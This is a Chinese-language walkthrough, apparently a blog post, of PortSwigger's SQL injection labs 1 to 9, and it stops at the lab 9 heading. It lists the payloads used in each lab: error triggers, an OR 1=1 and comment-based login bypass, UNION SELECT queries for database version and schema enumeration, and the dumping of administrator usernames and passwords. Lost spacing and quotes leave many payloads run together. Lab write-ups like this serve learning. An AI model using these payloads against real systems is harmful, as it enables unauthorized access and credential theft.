
文章目录portswigger_SQL注入portswigger_SQL注入第一关WHERE条款中允许检索隐藏数据的SQL注入漏洞portswigger_SQL注入第二关允许登录绕过的SQL注入漏洞portswigger_SQL注入第三关SQL注入攻击查询Oracle数据库类型和版本portswigger_SQL注入第四关SQL注入攻击查询MySQL和Microsoft数据库类型和版本portswigger_SQL注入第五关SQL 注入攻击列出非 Oracle 数据库的内容portswigger_SQL注入第六关SQL 注入攻击列出 Oracle 数据库内容portswigger_SQL注入第七关SQL注入UNION攻击确定查询返回的列数portswigger_SQL注入第八关SQL注入UNION攻击发现包含文本的列portswigger_SQL注入第九关SQL注入UNION攻击从其他表获取数据portswigger_SQL注入sql注入分类1.按提交方式GET型、POST型、Cookie型2.按注入点分类数字型、字符型、搜索型3.按页面返回反馈分类布尔型、时间型、报错型、堆叠型4.其他类文件读写、二次注入portswigger_SQL注入第一关WHERE条款中允许检索隐藏数据的SQL注入漏洞注入类别GET型字符型报错型注入方法联合查询注入进入实验室然后进行点击抓包抓到的数据包数据如下其中有参数“category”对其进行传参1sss’页面报错状态码为500直接在参数category后面接参数如下OR11--价格顺序已变,存在注入portswigger_SQL注入第二关允许登录绕过的SQL注入漏洞注入类别POST型字符型报错型在username传入一下参数administrator‘现在在username传入以下参数看到状态码为302重定向administrator’--portswigger_SQL注入第三关SQL注入攻击查询Oracle数据库类型和版本注入类别GET型字符型报错型注入方法联合查询注入点击进行抓包发现可控参数是“category”对其category进行传参1sss’页面报错发现状态码为500直接在参数category后面接如下参数UNIONSELECTBANNER,NULLFROMv$version--portswigger_SQL注入第四关SQL注入攻击查询MySQL和Microsoft数据库类型和版本注入类别GET型字符型报错型**点击这抓包可控参数是“category对参数进行传参1sss’页面报错状态码为500对category传入如下参数UNIONSELECTversion,NULL#portswigger_SQL注入第五关SQL 注入攻击列出非 Oracle 数据库的内容注入类别GET型字符型报错型点击抓包发现可控参数“category”对参数进行传参1sss’观察两者的状态码页面报错对可控参数传以下参数获取数据库中的表UNIONSELECTtable_name,NULLFROMinformation_schema.tables--找到带有用户名的表并传入如下参数UNIONSELECTcolumn_name,NULLFROMinformation_schema.columnsWHEREtable_nameusers_ifbsar--找到用户名和密码的列名并传入参数如下UNIONSELECTusername_foyxpm,password_zytcdaFROMusers_ifbsar--获取到管理员的账号和密码然后登录portswigger_SQL注入第六关SQL 注入攻击列出 Oracle 数据库内容注入类别GET型字符型布尔型点击页面找到可控参数可控参数是“category”传入参数1sss’,发现页面返回错误进行传参发现由两列数据可控参数如下UNIONSELECThello,helloFROMdual--传入查询表的参数并找到带有用户名的表参数如下UNIONSELECTtable_name,NULLFROMall_tables--查看这个用户名表的信息并找到用户名和密码的列名参数如下UNIONSELECTcolumn_name,NULLFROMall_tab_columnsWHEREtable_nameUSERS_QWLNOP--查看列中的数据并找到管理员用户和密码参数如下UNIONSELECTUSERNAME_ONRXML,PASSWORD_NCHVJZFROMUSERS_QWLNOP--登录管理员账户portswigger_SQL注入第七关SQL注入UNION攻击确定查询返回的列数注入类别GET型布尔型堆叠型时间盲注型点击页面找到可控参数“category”传入参数1sss’,发现页面报错添加空值参数直至页面不报错参数如下UNIONSELECTNULL,NULL--接着添加空值直至页面不报错发现返回的列数为三列参数如下UNIONSELECTNULL,NULL,NULL--portswigger_SQL注入第八关SQL注入UNION攻击发现包含文本的列注入类别GET型布尔型堆叠型时间盲注点击页面查看可控参数可控参数为“category”传入空值参数查看返回值发现返回三列以及随机值UNIONSELECTNULL,NULL,NULL--用随机值逐次替换空值UNIONSELECTNULL,lDeGcV,NULL--portswigger_SQL注入第九关SQL注入UNION攻击从其他表获取数据